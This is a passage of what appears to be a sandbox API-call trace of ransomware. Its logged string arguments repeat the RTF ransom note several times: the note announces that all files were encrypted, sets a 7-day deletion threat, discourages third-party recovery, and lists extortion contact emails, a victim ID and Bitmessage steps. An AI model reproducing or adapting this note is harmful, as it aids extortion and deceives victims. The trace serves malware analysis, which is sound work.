translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.495] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 